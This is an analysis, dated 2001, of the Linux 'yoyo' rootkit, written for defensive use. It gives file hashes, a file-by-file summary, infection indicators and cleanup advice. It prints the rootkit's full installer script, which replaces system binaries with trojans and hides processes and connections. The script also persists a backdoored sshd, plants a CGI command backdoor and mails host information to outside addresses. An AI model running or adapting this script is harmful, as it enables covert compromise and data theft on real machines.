Date of Analyse : 28/05/01
Author : Fredrik [ press@alldas.de ]
Description: Linux rootkit ( yoyo ) 

-----[ Disclaimer

Information revealed in this and other analysis are in no way made to contribute illegal actions
such as hacking or other forms of computer crimes. They should serve as informative sources
to prevent actions like mentioned before.

-----[ Introduction

This rootkit was sent to us by an anonymous source. 
We will try to explain in short terms what a rootkit like this does and how you know
if you are infected. The binaries are from the famous linux rootkit (lrk).

(My own comments in "[ ]")

These are the files that comes with the rootkit package yoyo.tar.gz (yoyo.tar.gz 515790 bytes) :

fredrik@slaptop:~/analys/.ppp$ ls -al
total 1096
drwxr-xr-x   2 fredrik  users        4096 May 26 11:48 ./
drwxr-xr-x   3 fredrik  users        4096 May 26 11:48 ../
-rwxr-xr-x   1 fredrik  users        4060 Sep 26  1983 citeste*
-rwx------   1 fredrik  users          75 Sep 26  1983 clear*
-rwx------   1 fredrik  users        2917 May 12 07:05 exec*
-rwxr--r--   1 fredrik  users         121 Apr  7 14:15 finger*
-rwx------   1 fredrik  users        8268 Sep 26  1983 flood*
-rwxr-xr-x   1 fredrik  users       48890 Mar 13 19:34 god*
-rwxr-xr-x   1 fredrik  users      632066 Apr  7 15:16 gpm*
-rwxr-xr-x   1 fredrik  users       19840 Sep 26  1983 ifconfig*
-rw-r--r--   1 fredrik  users        3278 Jan 27 16:11 inetd.conf
-rwxr-xr-x   1 fredrik  users       35300 Sep 26  1983 netstat*
-rwxr--r--   1 fredrik  users         611 Apr  7 13:42 patch*
-rwxr-xr-x   1 fredrik  users       33280 Sep 26  1983 ps*
-rw-r--r--   1 fredrik  users         700 May  5 08:24 s
-rw-------   1 fredrik  users         540 Oct 22  2000 ssh_host_key
-rw-------   1 fredrik  users         512 Oct 22  2000 ssh_random_seed
-rwx------   1 fredrik  users        7165 Sep 26  1983 tcp*
-rw-r--r--   1 fredrik  users           0 Apr 21 11:06 tcp.log
-rwxr-xr-x   1 fredrik  users       53588 Sep 26  1983 top*
-rw-r--r--   1 fredrik  users      195637 Jan 14 21:09 wu-ftpd6x.rpm
-rwxr-xr-x   1 fredrik  users          72 Apr  7 14:51 xfs*
-rwxr-xr-x   1 fredrik  users        4620 Feb 26 16:23 yoyo.cgi*

MD5SUM output 

464dc23cac477c43418eb8d3ef087065  citeste
5f22ceb87631fbcbf32e59234feeaa5b  clear
7f08e94c6afda0ece244451775ec5308  exec
51b04922cef6a55df4bb6d30b5ad5af4  finger
4cfae8c44a6d1ede669d41fc320c7325  flood
69cfdfd0632677a37c88ecb6db8a94ac  god
8eebeec972e4f59056dbec6531a82eb1  gpm
086394958255553f6f38684dad97869e  ifconfig
b63485e42035328c0d900a71ff2e6bd7  inetd.conf
2b07576213c1c8b942451459b3dc4903  netstat
e75a34c9570df4bea3d81a8d9afe084b  patch
7728c15d89f27e376950f96a7510bf0f  ps
07287297c42d6b2e917f36d959296033  s
c2c1b08498ed71a908c581d634832672  ssh_host_key
ad265d3c07dea3151bacb6930e0b72d3  ssh_random_seed
6c0f96c1e43a23a21264f924ae732273  tcp
d41d8cd98f00b204e9800998ecf8427e  tcp.log
8ff0939cd49a0b2ef3156c7876afca4b  top
50c11f333641277ab75e6207bffb13b4  wu-ftpd6x.rpm
a798990d214e6700ca6a310b14561142  xfs
202a51b16ac8d1b4dc75de89e7344ed4  yoyo.cgi

-----[ Main

The following is the installation script called "exec" :

#!/bin/sh
unset HISTFILE				[ Unsetting histfile so no administrator won't see our commands ]
clear
chown root.root *			[ chown'ing all files to root so they always get root with these backdoors ]
echo "[[[-]]] Life..    [[[-]]]"
echo -n "[[[-]]] Porcariile [[[-]]]"
chattr -i /bin/ls			[ chattr -i so the files can be changed/removed/etc ]
chattr -i /bin/ps
chattr -i /bin/netstat
chattr -i /bin/top
chattr -i /sbin/ifconfig
chattr -i /usr/bin/hdparm
rm -rf /sbin/ifconfig			[ removing the normal binaries and replacing them with the new once ]
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
echo "[[[-]]] Done [[[-]]]"
echo -n "[[[-]]] Fisierele Din Dev [[[-]]]"
touch /dev/dsx
>/dev/dsx				[ processes hiding file for ps/top. 3 = hide everything containing that string]
echo "3 citeste" >>/dev/dsx
echo "3 patch" >>/dev/dsx
echo "3 tcp" >>/dev/dsx
echo "3 flood" >>/dev/dsx
echo "3 patch" >>/dev/dsx
echo "3 mech" >>/dev/dsx
echo "3 luckscan-a" >>/dev/dsx
echo "3 luckstatdx" >>/dev/dsx
echo "3 bnc" >>/dev/dsx
echo "3 psybnc" >>/dev/dsx
echo "3 gpm" >>/dev/dsx
echo "3 god" >>/dev/dsx
echo "3 tcp" >>/dev/dsx
touch /dev/caca
>/dev/caca
echo "1 194.102.107" >>/dev/caca	[ netstat hiding file, will hide all connections from 194.102.107 (Intersystems SRL,Romania)
echo "1 194.102.107" >>/dev/caca        [ and incoming connections to the ports 2407,666,6667, 5 and outgoing to ports 1711,54321 ]
echo "1 193" >>/dev/caca
echo "3 2407" >>/dev/caca
echo "3 666" >>/dev/caca
echo "3 6667" >>/dev/caca
echo "3 5" >>/dev/caca
echo "4 1711" >>/dev/caca
echo "4 54321" >>/dev/caca
echo
echo
echo "[[[-]]] Done [[[-]]]"

echo "[[[-]]] Directorul home [[[-]]]"
mkdir -p /var/lib/games/.src/		                     [ Making secret rootkit dir ]
echo "[[[-]]] Mutam fisierele [[[-]]]"
echo 
mv -f inetd.conf finger god patch tcp wu-ftpd6x.rpm clear citeste mech.set flood gpm s ssh_host_key ssh_random_seed /var/lib/games/.
src/                                                         [ copying all files into the rootkit directory ]
touch /var/lib/games/.src/tcp.log       		     [ zero'ing out the log file ]

# mv -f inetd.conf /etc
# killall -HUP inetd
echo "[[[-]]] Nice [[[-]]]"
echo "# X Font Server ..." >> /etc/rc.d/rc.sysinit           [ making the backdoored sshd start at bootup ]
echo "/usr/bin/xfs -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
mv xfs -f /usr/bin/					     [ installing startup script for the backdoored sshd ]
chmod 500 /usr/bin/xfs
chattr +i /usr/bin/xfs
/usr/bin/xfs

sleep 1

if [ -d /home/httpd/cgi-bin ]			     [ if a www-server is installed they install a cgi backdoor to allow command executions ]
then
mv -f yoyo.cgi /home/httpd/cgi-bin/
fi

if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f yoyo.cgi /usr/local/httpd/cgi-bin/
fi

if [ -d /usr/local/apache/cgi-bin ]
then
mv -f yoyo.cgi /usr/local/apache/cgi-bin/
fi

if [ -d /www/httpd/cgi-bin ]
then
mv -f yoyo.cgi /www/httpd/cgi-bin/
fi

if [ -d /www/cgi-bin ]
then
mv -f yoyo.cgi /www/cgi-bin/
fi

echo "** Luam Informatiile dorite ..."		[ gathering information about the computer and mails it to razvantena1@yahoo.com and razvant20@linuxmail.org ]
echo "* Info : $(uname -a)" >> calc
echo "* Hostname : $(hostname -f)" >> calc
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> calc
echo "* Uptime : $(uptime)" >> calc
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> calc
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> calc
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> calc
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> calc
echo "* Spatiu Liber: $(df -h)" >> calc
echo "** Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat calc | mail -s "65289" razvantena1@yahoo.com
cat calc | mail -s "65289" razvant20@linuxmail.org
echo "** Am trimis mailul ... stergem fisierele care nu mai trebuie"
echo "[[[-]]] G * A * T * A [[[-]]]" 
cd ..
rm -rf calc rk yoyo.tar.gz			[ removing traces of the rootkit ]
						[ end of installation script ]


fredrik@slaptop:~/analys/.ppp$ strings xfs	[ This script is located in /usr/bin/xfs and it starts the sshd backdoor ]
#!/bin/sh
cd /var/lib/games/.src
./gpm -f ./s
./tcp >> ./tcp.log &
cd /

-----[ File summary

.ppp/           =>

exec 		=	 installation file 

citeste 	= 	Sorting out the snifferlog made by linsniffer666
clear 		= 	Kills the sniffer, removes the log and restart the sniffer.
finger 		= 	Shellscript that unpacks psybnc and starts it.
flood 		= 	An old syn flooder (dos tool).
god 		= 	Remote exploit for wu-ftpd2.6.0(1). (source code : http://packetstorm.securify.com/0006-exploits/wuftpd2600.c)
gpm 		= 	Backdoored version of sshd. will listen on port 65289 and a magic password to drop a bash shell.
ifconfig 	= 	Trojan which hides promiscious mode when sniffing.
inetd.conf 	= 	A replacement for /etc/inetd.conf to enable/disable certain services.
netstat 	=	Netstat trojan to hide connections to/from the local machine. Control file = /dev/caca
patch 		=	It will kill and remove the portmap startup script, will also patch wu-ftpd. 
ps/op 		= 	Trojan to hide processes. Control file = /dev/dsx.
s 		= 	Server config for the backdoored sshd.
ssh_host_key 	= 	host_key for the backdoored sshd binary (made by root@dil2.datainfosys.net)
ssh_random_seed = 	File needed by the backdoor.
tcp.log 	=	Sniffer logfile
tcp 		=	A basic linsniffer.
wu-ftpd6x.rpm   =	The patched version of wu-ftpd2.6.0(1).
xfs 		=	Shellscript to start the backdoored sshd. 
yoyo.cgi 	= 	Cgi script that will be placed in the cgi-bin/ dir to allow remote execution of commands.


-----[ Am I infected ? How do I clean up ?

Q: Am I infected ?
A: If the files /dev/caca and /dev/dsx exist you are most likely infected. 
Also check for filechanges and if the rootkit directory /var/lib/games/.src/ exists. Notice that the
/bin/ls binary might be trojaned so you might not see that directory. Check /dev/caca and /dev/dsx
in first place.

Q: How do I clean up ?
A: Total reinstallation would be the best choice. Follow the normal procedures after a penetration.

-----[ Conclusion 

This rootkit is developed and compiled for Linux. It seems to be made
to backdoor computers that have been compromised by the wu-ftpd2.6.0(1) exploit.
The kit patches that hole and kills the portmapper to deny rpc requests and it also
contain a wu-ftpd2.6.0 exploit as mentioned before. Two backdoors are placed on the system, one
sshd backdoor that runs on a high port and a cgi command executer (if a www-server is installed). 
The replacement file for inetd.conf only has telnet and pop3 open. The rest is closed. 

Keep all your software up-to-date and follow mailinglists such as bugtraq. Patch and maintain your server
as often as possible and the risk of getting penetrated will be much less.
Thank you for reading.

Fredrik Östergren.
press@alldas.de